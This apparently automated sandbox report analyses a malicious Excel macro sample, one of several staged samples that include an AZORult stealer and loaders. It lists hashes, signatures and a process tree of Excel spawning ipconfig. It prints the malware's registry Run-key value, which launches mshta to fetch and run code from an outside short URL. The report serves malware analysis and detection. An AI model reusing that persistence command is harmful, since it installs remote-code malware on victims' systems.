Overview
overview
10Static
static
10stage1-macro.xls
windows7-x64
10stage1-macro.xls
windows10-2004-x64
10stage5-azorult.exe
windows7-x64
10stage5-azorult.exe
windows10-2004-x64
10stage5-loa...ed.dll
windows7-x64
1stage5-loa...ed.dll
windows10-2004-x64
1stage5-loa...ll.ps1
windows7-x64
3stage5-loa...ll.ps1
windows10-2004-x64
3stage5-loader.dll
windows7-x64
1stage5-loader.dll
windows10-2004-x64
1Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
28-09-2024 13:38
Behavioral task
behavioral1
Sample
stage1-macro.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
stage1-macro.xls
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
stage5-azorult.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
stage5-azorult.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
stage5-loader-cleaned.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
stage5-loader-cleaned.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
stage5-loader-powershell.ps1
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
stage5-loader-powershell.ps1
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
stage5-loader.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
stage5-loader.dll
Resource
win10v2004-20240802-en
General
-
Target
stage1-macro.xls
-
Size
36KB
-
MD5
0f49e06aaab8816a9d95815e749fb291
-
SHA1
e124c99646e1d7fa682e465630eda2159172dcb1
-
SHA256
f5190d29af5ba58c45b138751593e2f5ed014d42e5c37f05f6ea98ee8838c9e2
-
SHA512
c09fa102c120b8e3cd7cddd88fa7d228f551be6ba81727bff8dbab84520bc7e456e82288fa91a86d18b9447fe3e2e866fc2dc4733d19b84666a4cdbfb50308e0
-
SSDEEP
384:AGF3dXzjwE8qUGiKu7kriCj1wnb9uCFtw5HNqldMbhuDBfrgfXGvmeeernB/:VdDD8qji/7GikKu0YHT9vv
Malware Config
Signatures
-
Process spawned unexpected child process 10 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2772 2640 ipconfig.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2756 2640 ipconfig.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2816 2640 ipconfig.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2028 2640 ipconfig.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2792 2640 ipconfig.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2776 2640 ipconfig.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2900 2640 ipconfig.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2940 2640 ipconfig.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2892 2640 ipconfig.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1788 2640 ipconfig.exe 30 -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\fgiopoiuytresdfgh = "\"mshta\"\"http:\\\\j.mp\\fgiopoiuytresdfgh\"" EXCEL.EXE -
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Gathers network information 2 TTPs 10 IoCs
Uses commandline utility to view network configuration.
pid Process 2772 ipconfig.exe 2028 ipconfig.exe 2792 ipconfig.exe 2940 ipconfig.exe 2892 ipconfig.exe 1788 ipconfig.exe 2756 ipconfig.exe 2816 ipconfig.exe 2776 ipconfig.exe 2900 ipconfig.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2640 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2640 EXCEL.EXE 2640 EXCEL.EXE 2640 EXCEL.EXE -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 2640 wrote to memory of 2792 2640 EXCEL.EXE 31 PID 2640 wrote to memory of 2792 2640 EXCEL.EXE 31 PID 2640 wrote to memory of 2792 2640 EXCEL.EXE 31 PID 2640 wrote to memory of 2792 2640 EXCEL.EXE 31 PID 2640 wrote to memory of 2028 2640 EXCEL.EXE 32 PID 2640 wrote to memory of 2028 2640 EXCEL.EXE 32 PID 2640 wrote to memory of 2028 2640 EXCEL.EXE 32 PID 2640 wrote to memory of 2028 2640 EXCEL.EXE 32 PID 2640 wrote to memory of 2816 2640 EXCEL.EXE 33 PID 2640 wrote to memory of 2816 2640 EXCEL.EXE 33 PID 2640 wrote to memory of 2816 2640 EXCEL.EXE 33 PID 2640 wrote to memory of 2816 2640 EXCEL.EXE 33 PID 2640 wrote to memory of 2756 2640 EXCEL.EXE 34 PID 2640 wrote to memory of 2756 2640 EXCEL.EXE 34 PID 2640 wrote to memory of 2756 2640 EXCEL.EXE 34 PID 2640 wrote to memory of 2756 2640 EXCEL.EXE 34 PID 2640 wrote to memory of 2772 2640 EXCEL.EXE 35 PID 2640 wrote to memory of 2772 2640 EXCEL.EXE 35 PID 2640 wrote to memory of 2772 2640 EXCEL.EXE 35 PID 2640 wrote to memory of 2772 2640 EXCEL.EXE 35 PID 2640 wrote to memory of 2776 2640 EXCEL.EXE 36 PID 2640 wrote to memory of 2776 2640 EXCEL.EXE 36 PID 2640 wrote to memory of 2776 2640 EXCEL.EXE 36 PID 2640 wrote to memory of 2776 2640 EXCEL.EXE 36 PID 2640 wrote to memory of 2900 2640 EXCEL.EXE 37 PID 2640 wrote to memory of 2900 2640 EXCEL.EXE 37 PID 2640 wrote to memory of 2900 2640 EXCEL.EXE 37 PID 2640 wrote to memory of 2900 2640 EXCEL.EXE 37 PID 2640 wrote to memory of 2940 2640 EXCEL.EXE 38 PID 2640 wrote to memory of 2940 2640 EXCEL.EXE 38 PID 2640 wrote to memory of 2940 2640 EXCEL.EXE 38 PID 2640 wrote to memory of 2940 2640 EXCEL.EXE 38 PID 2640 wrote to memory of 2892 2640 EXCEL.EXE 39 PID 2640 wrote to memory of 2892 2640 EXCEL.EXE 39 PID 2640 wrote to memory of 2892 2640 EXCEL.EXE 39 PID 2640 wrote to memory of 2892 2640 EXCEL.EXE 39 PID 2640 wrote to memory of 1788 2640 EXCEL.EXE 40 PID 2640 wrote to memory of 1788 2640 EXCEL.EXE 40 PID 2640 wrote to memory of 1788 2640 EXCEL.EXE 40 PID 2640 wrote to memory of 1788 2640 EXCEL.EXE 40
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\stage1-macro.xls1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2792
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2028
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2816
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2756
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2772
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2776
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2900
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2940
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2892
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Gathers network information
PID:1788
-